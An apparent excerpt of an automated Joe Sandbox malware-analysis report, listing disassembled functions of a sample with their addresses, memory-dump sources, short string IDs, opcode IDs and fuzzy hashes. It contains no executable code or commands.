                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.2651764074.00007FFAAB830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB830000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ffaab830000_jW5TA1J9Z1.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: $r63
                                                                      • API String ID: 0-3997696496
                                                                      • Opcode ID: b0ed5bf8cbaae7e7b84e48e9948eda72194a81d328003ed8b2d0133b611f49a7
                                                                      • Instruction ID: d892f96d18ba1c1277008250180a07a46281f8699907d55416a280c898491b3f
                                                                      • Opcode Fuzzy Hash: b0ed5bf8cbaae7e7b84e48e9948eda72194a81d328003ed8b2d0133b611f49a7
                                                                      • Instruction Fuzzy Hash: 3F414B75D1960ACFDB09DBA8C4905FDBBB1FF49340F1080BAC01EA72D2CA396945CB90
                                                                      Function 00007FFAAB83D4BD Relevance: 2.6, Strings: 2, Instructions: 103COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.2651764074.00007FFAAB830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB830000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ffaab830000_jW5TA1J9Z1.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: r63$r63
                                                                      • API String ID: 0-2640113253
                                                                      • Opcode ID: bf3a94be22097ae57a0962bebe9b8401952aaf30934648e59e951f22843c3a19
                                                                      • Instruction ID: 17e784050d1ba937c8c12bfe9f68678dfb15b9e8cb7eb1765bebc9581a553565
                                                                      • Opcode Fuzzy Hash: bf3a94be22097ae57a0962bebe9b8401952aaf30934648e59e951f22843c3a19
                                                                      • Instruction Fuzzy Hash: 55317071A0990A9FDB48DB5CD4919B8F7A1FF99350B50C179D01EC3296DF24B856CBC0
                                                                      Function 00007FFAAB83727D Relevance: 2.6, Strings: 2, Instructions: 100COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.2651764074.00007FFAAB830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB830000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ffaab830000_jW5TA1J9Z1.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: r63$r63
                                                                      • API String ID: 0-2640113253
                                                                      • Opcode ID: cb9c904a2433f5d44fba8b46246b99ab6014d07eb24e6c9920656f7860a400d3
                                                                      • Instruction ID: eb9670618f831e623220dbdcae4822b27cc2c602e9f50002414d6ed8ebb6dd21
                                                                      • Opcode Fuzzy Hash: cb9c904a2433f5d44fba8b46246b99ab6014d07eb24e6c9920656f7860a400d3
                                                                      • Instruction Fuzzy Hash: 47317C35A0990ADFEB48DB5CD4919B8B3A2FF99350B508179E01ED3692CF34B856CBC0
                                                                      Function 00007FFAAB83224B Relevance: 2.6, Strings: 2, Instructions: 95COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.2651764074.00007FFAAB830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB830000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ffaab830000_jW5TA1J9Z1.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: r63$r63
                                                                      • API String ID: 0-2640113253
                                                                      • Opcode ID: 2a574f5a2b1cdd07e34ae7a66dd2c3ec2478fb6af2b43a9cedcf347a3bbede02
                                                                      • Instruction ID: 928c47dc9e0865373c933512499cba92ea13071f15fb9a2999675466cac124eb
                                                                      • Opcode Fuzzy Hash: 2a574f5a2b1cdd07e34ae7a66dd2c3ec2478fb6af2b43a9cedcf347a3bbede02
                                                                      • Instruction Fuzzy Hash: 5B314971A1990A8FDB58EB18D8919B8F3A2FF99350B548179D01EC3692CE24BC168BC0
                                                                      Function 00007FFAAB83D57A Relevance: 2.6, Strings: 2, Instructions: 95COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.2651764074.00007FFAAB830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB830000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ffaab830000_jW5TA1J9Z1.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: r63$r63
                                                                      • API String ID: 0-2640113253
                                                                      • Opcode ID: 2b5aa7a462e13ffa20a4ee826dbb27e37f73e9226089e1c3c009af1b2a7c82e2
                                                                      • Instruction ID: e7c30d711349b46e6a632f870b9399babccd7492e26e44301b8de7ada8d2f0a7
                                                                      • Opcode Fuzzy Hash: 2b5aa7a462e13ffa20a4ee826dbb27e37f73e9226089e1c3c009af1b2a7c82e2
                                                                      • Instruction Fuzzy Hash: 72314672E0D9468FEB48A75CC8522E8B7D0FF99350F4081BAD01EC32D6ED14B85A87C0
                                                                      Function 00007FFAAB834AA1 Relevance: 1.7, Strings: 1, Instructions: 405COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.2651764074.00007FFAAB830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB830000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ffaab830000_jW5TA1J9Z1.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: W
                                                                      • API String ID: 0-655174618
                                                                      • Opcode ID: 3497aee837b03281f9d6072959854924a4fdd556a85a396100125686e2f7ceb6
                                                                      • Instruction ID: 1398c117be5f3c6c6ac48b94ad188920cf592ec8dab4e430fc65f9622bab8085
                                                                      • Opcode Fuzzy Hash: 3497aee837b03281f9d6072959854924a4fdd556a85a396100125686e2f7ceb6
                                                                      • Instruction Fuzzy Hash: 4ED1D73090EB06CFD368DB2CD49157577E1FF4A750B1885BDC48EC76E2DA29B84A8781
                                                                      Function 00007FFAAB839AF1 Relevance: 1.6, Strings: 1, Instructions: 399COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.2651764074.00007FFAAB830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB830000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ffaab830000_jW5TA1J9Z1.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: U
                                                                      • API String ID: 0-3372436214
                                                                      • Opcode ID: a10f17c075cb330d0a69b9b9d5730fe568425fe86006b6bd9d6a44c83a3956a0
                                                                      • Instruction ID: 33e291785201c987088554f9c26e5690e385741e5efa4d263ebba4cc6da48a5c
                                                                      • Opcode Fuzzy Hash: a10f17c075cb330d0a69b9b9d5730fe568425fe86006b6bd9d6a44c83a3956a0
                                                                      • Instruction Fuzzy Hash: A7D1D33090EB46CFE368DB2CD48157577E1FF4A340B1485BEC48F876E2DA69B84A8781
                                                                      Function 00007FFAAB837896 Relevance: 1.5, Strings: 1, Instructions: 270COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.2651764074.00007FFAAB830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB830000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ffaab830000_jW5TA1J9Z1.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: A
                                                                      • API String ID: 0-3554254475
                                                                      • Opcode ID: e31da3679a1b54bb1f25f204ff0ae3db8a80a7d4f8b6e2a52d25c9b9a42217aa
                                                                      • Instruction ID: a881899ef99ca3f7b82b2bf040754409539a950aa064ebe45329894408835253
                                                                      • Opcode Fuzzy Hash: e31da3679a1b54bb1f25f204ff0ae3db8a80a7d4f8b6e2a52d25c9b9a42217aa
                                                                      • Instruction Fuzzy Hash: C581463590E646CFE7689B2C945197977E1EF8A350B1485FED48EC31E3DA28F80A8781
                                                                      Function 00007FFAAB832846 Relevance: 1.5, Strings: 1, Instructions: 259COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.2651764074.00007FFAAB830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB830000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ffaab830000_jW5TA1J9Z1.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: A
                                                                      • API String ID: 0-3554254475
                                                                      • Opcode ID: 395ce879280aeaf52e6708bcaaa5e74a0af4bade17c6f72ce5f2d12a76f3268f
                                                                      • Instruction ID: 436978bfb6de35f0da75990ab3f8a01cc21a554eaaf7688819fd23eb031c6041
                                                                      • Opcode Fuzzy Hash: 395ce879280aeaf52e6708bcaaa5e74a0af4bade17c6f72ce5f2d12a76f3268f
                                                                      • Instruction Fuzzy Hash: EC81363190E6068FE7289F2CD4559B977E1EF4A390F1484BED49FC31E2DE28B8468781
                                                                      Function 00007FFAAB4819AA Relevance: 1.5, Strings: 1, Instructions: 258COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.2641675190.00007FFAAB471000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB471000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ffaab471000_jW5TA1J9Z1.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: K_H
                                                                      • API String ID: 0-1705474702
                                                                      • Opcode ID: f62dd0eeff926d9568b573bc26a3668e8357f993fc174ba72f5ce4ce7b1e867b
                                                                      • Instruction ID: d6c71dabecb53dbf2f8f38cd0dfd0c4c1755581500c973260a92feac17b8e079
                                                                      • Opcode Fuzzy Hash: f62dd0eeff926d9568b573bc26a3668e8357f993fc174ba72f5ce4ce7b1e867b
                                                                      • Instruction Fuzzy Hash: 72917E75E18A09CBEB54EBA8D895AFCB7F2FF99340F104176D01DD3292DE286841CB91
                                                                      Function 00007FFAAB83659B Relevance: 1.5, Strings: 1, Instructions: 233COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.2651764074.00007FFAAB830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB830000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ffaab830000_jW5TA1J9Z1.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: /3
                                                                      • API String ID: 0-2516180287
                                                                      • Opcode ID: 9eafa55d2b288b7c0c87b74838a8800e516e157b3aa75d3f5d12b84db852afe1
                                                                      • Instruction ID: 1c27c526e4f349ecc3f430efc83f3eec7d86cb03adefe29025a6f528ac3b714f
                                                                      • Opcode Fuzzy Hash: 9eafa55d2b288b7c0c87b74838a8800e516e157b3aa75d3f5d12b84db852afe1
                                                                      • Instruction Fuzzy Hash: CE71AC7191E64ACFEB54DB6CC8506BDBBA1FF4A380F5445B9D00EC31E5EA28A8498780
                                                                      Function 00007FFAAB83156B Relevance: 1.5, Strings: 1, Instructions: 219COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.2651764074.00007FFAAB830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB830000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ffaab830000_jW5TA1J9Z1.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: /3
                                                                      • API String ID: 0-2516180287
                                                                      • Opcode ID: 90549a5847b880ca9efa054d4e3fdb5085e2b14564700dacd0a1d0809883b112
                                                                      • Instruction ID: 321250008c899ef94b496602ed36e49a68c7cd26d01792d5ed988838365f14cf
                                                                      • Opcode Fuzzy Hash: 90549a5847b880ca9efa054d4e3fdb5085e2b14564700dacd0a1d0809883b112
                                                                      • Instruction Fuzzy Hash: 7371C231D1A64ACFEB54EB68C8546FDBBB0FF4A780F1445B9D00ED31E1DE28A8499780
                                                                      Function 00007FFAAB835FB5 Relevance: 1.4, Strings: 1, Instructions: 167COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.2651764074.00007FFAAB830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB830000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ffaab830000_jW5TA1J9Z1.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: (3<
                                                                      • API String ID: 0-1757463135
                                                                      • Opcode ID: 4386be5a2220696ff444d627fa22e62283507984c0561e650ed722223ecc6c52
                                                                      • Instruction ID: c42d588a3e549e2e022f2e5f3ddde2e1ba93793bc216c7a95e6e88e2453ea760
                                                                      • Opcode Fuzzy Hash: 4386be5a2220696ff444d627fa22e62283507984c0561e650ed722223ecc6c52
                                                                      • Instruction Fuzzy Hash: FA513C71909A5ACFDBA8DB1CC455BADB7B0FB59340F1040FAD00EE32D1DA346989CB91
                                                                      Function 00007FFAAB830651 Relevance: 1.4, Strings: 1, Instructions: 139COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.2651764074.00007FFAAB830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB830000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ffaab830000_jW5TA1J9Z1.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: H
                                                                      • API String ID: 0-2852464175
                                                                      • Opcode ID: 795e94ec8050e78367144d75dfe675195fb8eeadac807d3d27cd032ffce2d68e
                                                                      • Instruction ID: 5d2fc350c9d88ced82434d7577427f13533ce340d341b3a4a540a412727ab984
                                                                      • Opcode Fuzzy Hash: 795e94ec8050e78367144d75dfe675195fb8eeadac807d3d27cd032ffce2d68e
                                                                      • Instruction Fuzzy Hash: C2418F7090E789CFDB45DB68C8606ACBFB0EF5A240F5841FAC04ED71E3DA296849C751
                                                                      Function 00007FFAAB83F070 Relevance: 1.4, Strings: 1, Instructions: 128COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.2651764074.00007FFAAB830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB830000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ffaab830000_jW5TA1J9Z1.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: b43
                                                                      • API String ID: 0-515797068
                                                                      • Opcode ID: 12542bb5beb26e4210c9b8197502348646749573827e15760442ce1f014a1571
                                                                      • Instruction ID: 4555e127aa147babf00a653012dbc439d8bd71fa04a81be1bb0d0ce1b3957367
                                                                      • Opcode Fuzzy Hash: 12542bb5beb26e4210c9b8197502348646749573827e15760442ce1f014a1571
                                                                      • Instruction Fuzzy Hash: 6D41D12091D91A8BEB69972CD4606BD77A1FF5A300F1086FAD04EC71D6DA38B98987C1
                                                                      Function 00007FFAAB472CB6 Relevance: 1.4, Strings: 1, Instructions: 120COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.2641675190.00007FFAAB471000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB471000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ffaab471000_jW5TA1J9Z1.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: r63
                                                                      • API String ID: 0-1294201789
                                                                      • Opcode ID: 2d958b0cf5c7e11f591a24038a59c2fd976ebdcec2cb6e283056e9d0ed5195ec
                                                                      • Instruction ID: 4434accc5fb22a2eeab0c960729556c0b66c1e09cf12233ee8a51952b54bd1f3
                                                                      • Opcode Fuzzy Hash: 2d958b0cf5c7e11f591a24038a59c2fd976ebdcec2cb6e283056e9d0ed5195ec
                                                                      • Instruction Fuzzy Hash: 8141C531A0895ACFDB59E758C494BB877A6FB9A350F0442B9D00DC72D6CE286CC9C7C1
                                                                      Function 00007FFAAB832519 Relevance: 1.4, Strings: 1, Instructions: 103COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.2651764074.00007FFAAB830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB830000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ffaab830000_jW5TA1J9Z1.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: W
                                                                      • API String ID: 0-655174618
                                                                      • Opcode ID: bba347245900a0f1ec63c7c673cddf34440e58f0c334996d22ba8920d72407c4
                                                                      • Instruction ID: d62188f359edc814e55f7488c7b7d7a11845f3a884e633bd9a6dfbd4ee50cdc8
                                                                      • Opcode Fuzzy Hash: bba347245900a0f1ec63c7c673cddf34440e58f0c334996d22ba8920d72407c4
                                                                      • Instruction Fuzzy Hash: F331F92190F6C68FE7965B7C58641B57FA0DF0B394F0841FBD09DCA0E7E918A94AC391
                                                                      Function 00007FFAAB837354 Relevance: 1.3, Strings: 1, Instructions: 87COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.2651764074.00007FFAAB830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB830000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ffaab830000_jW5TA1J9Z1.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: r63
                                                                      • API String ID: 0-1294201789
                                                                      • Opcode ID: 20f412f61c4b35eec42344da7228261650e3794f60f192e0ccc3fe9c532947f6
                                                                      • Instruction ID: a595a3c24a48f2ef841b2ff36307c62c3a3c76e1ee9064141c0ca29684c39baf
                                                                      • Opcode Fuzzy Hash: 20f412f61c4b35eec42344da7228261650e3794f60f192e0ccc3fe9c532947f6
                                                                      • Instruction Fuzzy Hash: AB210625A1EA458FEB58D76C94526F877E0FF5A350F5441BDD40DC31D3DA28B80A83C0
                                                                      Function 00007FFAAB8311E2 Relevance: 1.3, Strings: 1, Instructions: 82COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.2651764074.00007FFAAB830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB830000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ffaab830000_jW5TA1J9Z1.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: r63
                                                                      • API String ID: 0-1294201789
                                                                      • Opcode ID: 73b56defe6930859f8e86cc538cf507910b28c15fbd797c705889a8dbbde18d6
                                                                      • Instruction ID: 8e8e37e335d6d7b8e0dd0223d662c00cfbcb20103f77eb273757f2e49ad392d2
                                                                      • Opcode Fuzzy Hash: 73b56defe6930859f8e86cc538cf507910b28c15fbd797c705889a8dbbde18d6
                                                                      • Instruction Fuzzy Hash: C121D771A0991D9FDF98EB58C495AEDB7B1FF6D300F4041AED04EE32A1CA35A991CB40
                                                                      Function 00007FFAAB8356C8 Relevance: 1.3, Strings: 1, Instructions: 77COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.2651764074.00007FFAAB830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB830000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ffaab830000_jW5TA1J9Z1.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: U
                                                                      • API String ID: 0-3372436214
                                                                      • Opcode ID: 1216e502e2098d8eb3fd85429ec91dbbaa15680d554a4edffe946e204e8536b4
                                                                      • Instruction ID: 1f21771764d9daad9984792b01e2335940f1b158a7ff9412416ded987f5715c2
                                                                      • Opcode Fuzzy Hash: 1216e502e2098d8eb3fd85429ec91dbbaa15680d554a4edffe946e204e8536b4
                                                                      • Instruction Fuzzy Hash: D7213A3091994EDFDB44DB68C854AEDBBB1FF59340F1005BAD00EE32D1DA346949CB90
                                                                      Function 00007FFAAB83C469 Relevance: 1.3, Strings: 1, Instructions: 71COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.2651764074.00007FFAAB830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB830000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ffaab830000_jW5TA1J9Z1.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: r63
                                                                      • API String ID: 0-1294201789
                                                                      • Opcode ID: 876e6b97a21ee1c4762606e9f908131cc3730e8015040ec55a7e18726e3b0636
                                                                      • Instruction ID: 36a9820606a0308596b34817d056079d23d6505e626f7d511f8e4f144b8dbc7a
                                                                      • Opcode Fuzzy Hash: 876e6b97a21ee1c4762606e9f908131cc3730e8015040ec55a7e18726e3b0636
                                                                      • Instruction Fuzzy Hash: 00212A71A19A099FDB98EB68C455ABDB7B1FF59310F0040BED00EE32A1CE34A9448F80
                                                                      Function 00007FFAAB475494 Relevance: 1.3, Strings: 1, Instructions: 70COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.2641675190.00007FFAAB471000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB471000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ffaab471000_jW5TA1J9Z1.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 63
                                                                      • API String ID: 0-3819469774
                                                                      • Opcode ID: a609c87bdfd0ca5a3aa4e477aeb1f46ba3db5dd5ad1a8c09b1516ce0f96f4d3c
                                                                      • Instruction ID: d4709839bec0783511cb3c28ae2ca6c0b57974f562e444f25a1dbc8f792e132f
                                                                      • Opcode Fuzzy Hash: a609c87bdfd0ca5a3aa4e477aeb1f46ba3db5dd5ad1a8c09b1516ce0f96f4d3c
                                                                      • Instruction Fuzzy Hash: 86217FB2A199198FE798EB28C8966F8B3A1FFA9340F5085F5D04CC3192CD246DC58B80
                                                                      Function 00007FFAAB83D3F9 Relevance: 1.3, Strings: 1, Instructions: 69COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.2651764074.00007FFAAB830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB830000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ffaab830000_jW5TA1J9Z1.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: U
                                                                      • API String ID: 0-3372436214
                                                                      • Opcode ID: e150a67e7520465c0e9664cf3687837f9755353f5e938eb877bea625d6f7ebb4
                                                                      • Instruction ID: 31c217d5f446d2111a777694c71153901e3527af6b25a2bc13c5a1273cebb5c7
                                                                      • Opcode Fuzzy Hash: e150a67e7520465c0e9664cf3687837f9755353f5e938eb877bea625d6f7ebb4
                                                                      • Instruction Fuzzy Hash: 75115E3190E74A9FE3608768C8496B93BA1EF5B380F0581BAD00DD72D6DE687C4D83E1
                                                                      Function 00007FFAAB832560 Relevance: 1.3, Strings: 1, Instructions: 69COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.2651764074.00007FFAAB830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB830000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ffaab830000_jW5TA1J9Z1.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: W
                                                                      • API String ID: 0-655174618
                                                                      • Opcode ID: 24d7302521a366e087e3c6192e5515cf5acf2006f62830e044ea27f49b88c805
                                                                      • Instruction ID: c743845ecbe2540c2d23fe2588b39fafda5718e0b1808b6efa564aa7fa61262f
                                                                      • Opcode Fuzzy Hash: 24d7302521a366e087e3c6192e5515cf5acf2006f62830e044ea27f49b88c805
                                                                      • Instruction Fuzzy Hash: 5B215E1194F2C28FE7975B3818741742FA04F0B2A5B1885FBD0ED8A0E7E94CA94AC392
                                                                      Function 00007FFAAB83C159 Relevance: 1.3, Strings: 1, Instructions: 61COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.2651764074.00007FFAAB830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB830000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ffaab830000_jW5TA1J9Z1.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: W
                                                                      • API String ID: 0-655174618
                                                                      • Opcode ID: dd7cd0d7ffbc464724a3f983ac3b25725ccb93618aed7456057facd510527d46
                                                                      • Instruction ID: 6a6fe0b2d590ebc7eec6143c494a36309b14d43816b05f7d1761ff4aecd22018
                                                                      • Opcode Fuzzy Hash: dd7cd0d7ffbc464724a3f983ac3b25725ccb93618aed7456057facd510527d46
                                                                      • Instruction Fuzzy Hash: 40119D62D5F393C6F265272C69211BD7A005F4B7A0F1881FAE80E8A0E68C4C394D7AC2
                                                                      Function 00007FFAAB83BA4C Relevance: 1.3, Strings: 1, Instructions: 59COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.2651764074.00007FFAAB830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB830000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ffaab830000_jW5TA1J9Z1.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: H
                                                                      • API String ID: 0-2852464175
                                                                      • Opcode ID: 2de3e82102befea2139e6cce8d8aeb4bfcab6332394cf575e2b1bb07455ecf2f
                                                                      • Instruction ID: 80136cc8dd8c392a6687800ec83602f453d57d625f81b926a56ec141a90e5dca
                                                                      • Opcode Fuzzy Hash: 2de3e82102befea2139e6cce8d8aeb4bfcab6332394cf575e2b1bb07455ecf2f
                                                                      • Instruction Fuzzy Hash: DF11006044E7C20FD7039774882A1817FF0AE1712470E82EBC4C9CF4B3D60D480AC762
                                                                      Function 00007FFAAB484A6F Relevance: 1.3, Strings: 1, Instructions: 52COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.2641675190.00007FFAAB471000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB471000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ffaab471000_jW5TA1J9Z1.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 0W=
                                                                      • API String ID: 0-2879975314
                                                                      • Opcode ID: 9372ac446aa2f96d3378810c402136dc2351f614e2dc218249880e8d2c0a7b86
                                                                      • Instruction ID: 5167f22d4331fbd689970289e1df0c477ad49e79b2d959349a60f2388086615b
                                                                      • Opcode Fuzzy Hash: 9372ac446aa2f96d3378810c402136dc2351f614e2dc218249880e8d2c0a7b86
                                                                      • Instruction Fuzzy Hash: BA118E31E089098FDB48DB98C495ABD73F2FF98350F118229E40EE32A5CF386845CB80
                                                                      Function 00007FFAAB47E465 Relevance: 1.3, Strings: 1, Instructions: 48COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.2641675190.00007FFAAB471000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB471000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ffaab471000_jW5TA1J9Z1.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: @K_H
                                                                      • API String ID: 0-2210098489
                                                                      • Opcode ID: 0efed0622c52d8dd2064dd6651311c01055546fa67532284cea4baeeb149f081
                                                                      • Instruction ID: dc38a5825f93577b819644fdc418b4f4f6b3583801310e36e35485e7e882d986
                                                                      • Opcode Fuzzy Hash: 0efed0622c52d8dd2064dd6651311c01055546fa67532284cea4baeeb149f081
                                                                      • Instruction Fuzzy Hash: CE018431B49829CFE694E7188455BFD72DAEB56340F608275C40DC32E6DD286DC5C7C1
                                                                      Function 00007FFAAB47DF06 Relevance: 1.3, Strings: 1, Instructions: 48COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.2641675190.00007FFAAB471000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB471000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ffaab471000_jW5TA1J9Z1.jbxd
                                                                      Similarity
